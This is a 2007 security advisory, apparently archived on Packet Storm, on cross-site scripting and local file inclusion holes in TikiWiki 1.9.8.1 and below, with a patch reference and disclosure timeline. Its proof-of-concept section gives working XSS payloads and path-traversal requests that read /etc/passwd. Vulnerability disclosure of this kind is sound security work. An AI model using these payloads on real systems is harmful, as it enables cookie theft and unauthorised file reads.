exploit the possibilities

tikiwiki-xsslfi.txt

tikiwiki-xsslfi.txt
Posted Oct 25, 2007
Authored by L4teral

TikiWiki versions 1.9.8.1 and below suffer from cross site scripting and local file inclusion vulnerabilities.

tags | exploit, local, vulnerability, xss, file inclusion
MD5 | ef6579ac7fbae27297573ea056c43fa6

tikiwiki-xsslfi.txt

Change Mirror Download
======================================================================
TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion
======================================================================

Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting
Local File Inclusion
Status: patch available


------------------------------
Affected software description:
------------------------------

Application: TikiWiki
Version: <= 1.9.8.1
Vendor: http://tikiwiki.org

Description:
TikiWiki (Tiki) is your Groupware/CMS (Content Management System) solution.


--------------
Vulnerability:
--------------

XSS:
1. The password reminder page is vulnerable to cross site scripting.

2. Script code can be embedded into wiki-pages.

3. The script db/tiki-db.php is vulnerable to cross site scripting

LFI:
4.
The script db/tiki-db.php is vulnerable to local file inclusion attacks.

5.
The script tiki-imexport_languages.php is vulnerable to local file
inclusion attacks.


------------
PoC/Exploit:
------------

XSS:
1.
enter in the form: <img src="javascript:alert(document.cookie)">

URL: http://localhost/tikiwiki/tiki-remind_password.php
POSTDATA: username=%3Cimg+src%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3E
remind=send+me+my+password

2.
create wiki page with:
{img src=javascript:alert(document.cookie) }

3.
http://localhost/tikiwiki/tiki-index.php?local_php=<script>alert(document.cookie)</script>

LFI:
4.
register_globals required:
http://localhost/tikiwiki/tiki-index.php?error_handler_file=/etc/passwd
http://localhost/tikiwiki/tiki-index.php?local_php=/etc/passwd

5.
feature lang_use_db(use database for translation) must be activated:
URL: http://localhost/tikiwiki/tiki-imexport_languages.php
POSTDATA: imp_language=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&import=import


---------
Solution:
---------

update to 1.9.8.2 or above:
https://sourceforge.net/project/showfiles.php?group_id=64258&package_id=112134&release_id=549549

---------
Timeline:
---------

23.10.2007 - vendor informed
25.10.2007 - vendor released patch
25.10.2007 - public disclosure
Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    1 Files
  • 20
    Sep 20th
    1 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    21 Files
  • 23
    Sep 23rd
    8 Files
  • 24
    Sep 24th
    15 Files
  • 25
    Sep 25th
    4 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close